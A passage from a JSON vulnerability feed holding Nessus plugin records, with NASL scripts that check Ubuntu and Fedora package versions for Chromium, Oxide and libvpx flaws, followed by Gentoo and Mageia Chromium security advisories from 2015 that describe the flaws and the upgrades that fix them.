"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-25T13:55:14", "description": "It was discovered that Chromium did not properly handle the interaction of IPC, the gamepad API and V8. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to execute arbitrary code with the privileges of the user invoking the program. (CVE-2015-1233)\n\nA buffer overflow was discovered in the GPU service. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash. (CVE-2015-1234)\n\nIt was discovered that Oxide did not correctly manage the lifetime of BrowserContext, resulting in a potential use-after-free in some circumstances. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash or execute arbitrary code with the privileges of the user invoking the program. (CVE-2015-1317).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-04-08T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 14.10 : oxide-qt vulnerabilities (USN-2556-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234", "CVE-2015-1317"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:14.10"], "id": "UBUNTU_USN-2556-1.NASL", "href": "https://www.tenable.com/plugins/nessus/82642", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2556-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82642);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\", \"CVE-2015-1317\");\n script_bugtraq_id(73484, 73486);\n script_xref(name:\"USN\", value:\"2556-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 14.10 : oxide-qt vulnerabilities (USN-2556-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Chromium did not properly handle the\ninteraction of IPC, the gamepad API and V8. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to execute arbitrary code with the privileges of the user\ninvoking the program. (CVE-2015-1233)\n\nA buffer overflow was discovered in the GPU service. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via application\ncrash. (CVE-2015-1234)\n\nIt was discovered that Oxide did not correctly manage the lifetime of\nBrowserContext, resulting in a potential use-after-free in some\ncircumstances. If a user were tricked in to opening a specially\ncrafted website, an attacker could potentially exploit this to cause a\ndenial of service via application crash or execute arbitrary code with\nthe privileges of the user invoking the program. (CVE-2015-1317).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2556-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected liboxideqtcore0 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04|14\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 14.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.5.6-0ubuntu0.14.04.2\")) flag++;\nif (ubuntu_check(osver:\"14.10\", pkgname:\"liboxideqtcore0\", pkgver:\"1.5.6-0ubuntu0.14.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:24", "description": "libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384 to avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-09-21T00:00:00", "type": "nessus", "title": "Fedora 23 : libvpx-1.4.0-5.fc23 (2015-15934)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libvpx", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2015-15934.NASL", "href": "https://www.tenable.com/plugins/nessus/86043", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-15934.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86043);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1258\");\n script_xref(name:\"FEDORA\", value:\"2015-15934\");\n\n script_name(english:\"Fedora 23 : libvpx-1.4.0-5.fc23 (2015-15934)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix\nCVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to\nfix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384\nto avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223266\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/166975.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?32eb20c8\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvpx package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libvpx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"libvpx-1.4.0-5.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvpx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:29", "description": "libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384 to avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-09-25T00:00:00", "type": "nessus", "title": "Fedora 22 : libvpx-1.3.0-7.fc22 (2015-15936)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libvpx", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-15936.NASL", "href": "https://www.tenable.com/plugins/nessus/86131", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-15936.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86131);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1258\");\n script_xref(name:\"FEDORA\", value:\"2015-15936\");\n\n script_name(english:\"Fedora 22 : libvpx-1.3.0-7.fc22 (2015-15936)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix\nCVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to\nfix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384\nto avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223266\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-September/167428.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f5a715f2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvpx package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libvpx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"libvpx-1.3.0-7.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvpx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:25", "description": "libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to fix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384 to avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2015-10-06T00:00:00", "type": "nessus", "title": "Fedora 21 : libvpx-1.3.0-7.fc21 (2015-15935)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libvpx", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-15935.NASL", "href": "https://www.tenable.com/plugins/nessus/86275", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-15935.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(86275);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1258\");\n script_xref(name:\"FEDORA\", value:\"2015-15935\");\n\n script_name(english:\"Fedora 21 : libvpx-1.3.0-7.fc21 (2015-15935)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"libvpx-1.3.0-7.fc21 - set --size-limit=16384x16384 to fix\nCVE-2015-1258 libvpx-1.3.0-7.fc22 - set --size-limit=16384x16384 to\nfix CVE-2015-1258 libvpx-1.4.0-5.fc23 - set --size-limit=16384x16384\nto avoid CVE-2015-1258\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223266\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-October/168803.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1f438175\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libvpx package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libvpx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"libvpx-1.3.0-7.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libvpx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:07:00", "description": "### Background\n\nChromium is an open-source web browser project.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Chromium. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker can cause arbitrary remote code execution, Denial of Service or bypass of security mechanisms. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-43.0.2357.65\"", "cvss3": {}, "published": "2015-06-23T00:00:00", "type": "gentoo", "title": "Chromium: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1233", "CVE-2015-1234", "CVE-2015-1235", "CVE-2015-1236", "CVE-2015-1237", "CVE-2015-1238", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1242", "CVE-2015-1243", "CVE-2015-1244", "CVE-2015-1245", "CVE-2015-1246", "CVE-2015-1247", "CVE-2015-1248", "CVE-2015-1250", "CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-06-23T00:00:00", "id": "GLSA-201506-04", "href": "https://security.gentoo.org/glsa/201506-04", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Chromium-browser 43.0.2357.65 fixes a number of security issues: Use-after-free vulnerability in the SpeechRecognitionClient implementation in the Speech subsystem in Google Chrome before 43.0.2357.65 allows remote attackers to execute arbitrary code via a crafted document. (CVE-2015-1251) common/partial_circular_buffer.cc in Google Chrome before 43.0.2357.65 does not properly handle wraps, which allows remote attackers to bypass a sandbox protection mechanism or cause a denial of service (out-of-bounds write) via vectors that trigger a write operation with a large amount of data, related to the PartialCircularBuffer::Write and PartialCircularBuffer::DoWrite functions. (CVE-2015-1252) core/html/parser/HTMLConstructionSite.cpp in the DOM implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to bypass the Same Origin Policy via crafted JavaScript code that appends a child to a SCRIPT element, related to the insert and executeReparentTask functions. (CVE-2015-1253) core/dom/Document.cpp in Blink, as used in Google Chrome before 43.0.2357.65, enables the inheritance of the designMode attribute, which allows remote attackers to bypass the Same Origin Policy by leveraging the availability of editing. (CVE-2015-1254) Use-after-free vulnerability in content/renderer/media/webaudio_capturer_source.cc in the WebAudio implementation in Google Chrome before 43.0.2357.65 allows remote attackers to cause a denial of service (heap memory corruption) or possibly have unspecified other impact by leveraging improper handling of a stop action for an audio track. (CVE-2015-1255) Use-after-free vulnerability in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted document that leverages improper handling of a shadow tree for a use element. (CVE-2015-1256) platform/graphics/filters/FEColorMatrix.cpp in the SVG implementation in Blink, as used in Google Chrome before 43.0.2357.65, does not properly handle an insufficient number of values in an feColorMatrix filter, which allows remote attackers to cause a denial of service (container overflow) or possibly have unspecified other impact via a crafted document. (CVE-2015-1257) Google Chrome before 43.0.2357.65 relies on libvpx code that was not built with an appropriate --size-limit value, which allows remote attackers to trigger a negative value for a size field, and consequently cause a denial of service or possibly have unspecified other impact, via a crafted frame size in VP9 video data. (CVE-2015-1258) PDFium, as used in Google Chrome before 43.0.2357.65, does not properly initialize memory, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. (CVE-2015-1259) Multiple use-after-free vulnerabilities in content/renderer/media/user_media_client_impl.cc in the WebRTC implementation in Google Chrome before 43.0.2357.65 allow remote attackers to cause a denial of service or possibly have unspecified other impact via crafted JavaScript code that executes upon completion of a getUserMedia request. (CVE-2015-1260) platform/fonts/shaping/HarfBuzzShaper.cpp in Blink, as used in Google Chrome before 43.0.2357.65, does not initialize a certain width field, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted Unicode text. (CVE-2015-1262) The Spellcheck API implementation in Google Chrome before 43.0.2357.65 does not use an HTTPS session for downloading a Hunspell dictionary, which allows man-in-the-middle attackers to deliver incorrect spelling suggestions or possibly have unspecified other impact via a crafted file. (CVE-2015-1263) Cross-site scripting (XSS) vulnerability in Google Chrome before 43.0.2357.65 allows user-assisted remote attackers to inject arbitrary web script or HTML via crafted data that is improperly handled by the Bookmarks feature. (CVE-2015-1264) Multiple unspecified vulnerabilities in Google Chrome before 43.0.2357.65 allow attackers to cause a denial of service or possibly have other impact via unknown vectors. (CVE-2015-1265) Multiple vulnerabilities in V8 have been fixed at the tip of the 4.3 branch (currently 4.3.61.21). \n", "cvss3": {}, "published": "2015-05-23T18:53:02", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251", "CVE-2015-1252", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1255", "CVE-2015-1256", "CVE-2015-1257", "CVE-2015-1258", "CVE-2015-1259", "CVE-2015-1260", "CVE-2015-1262", "CVE-2015-1263", "CVE-2015-1264", "CVE-2015-1265"], "modified": "2015-05-23T18:53:02", "id": "MGASA-2015-0235", "href": "https://advisories.mageia.org/MGASA-2015-0235.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-18T11:19:34", "description": "Chromium-browser 42.0.2311.90 fixes several security issues, among others a cross-origin-bypass in HTML parser (CVE-2015-1235), a cross-origin-bypass in Blink (CVE-2015-1236), a use-after-free in IPC (CVE-2015-1237), an out-of-bounds write in Skia (CVE-2015-1238), an out-of-bounds read in WebGL (CVE-2015-1240), Tap-Jacking (CVE-2015-1241), type confusion in V8 (CVE-2015-1242), HSTS bypass in WebSockets (CVE-2015-1244), a use-after-free in PDFium (CVE-2015-1245), an out-of-bounds read in Blink (CVE-2015-1246), scheme issues in OpenSearch, (CVE-2015-1247), and a SafeBrowsing bypass (CVE-2015-1248). Also included are various fixes from internal audits, fuzzing and other initiatives (CVE-2015-1249), and multiple vulnerabilities in V8 have been fixed at the tip of the 4.2 branch (currently 4.2.77.14) (CVE-2015-3333). \n", "cvss3": {}, "published": "2015-04-23T21:14:25", "type": "mageia", "title": "Updated chromium-browser-stable packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 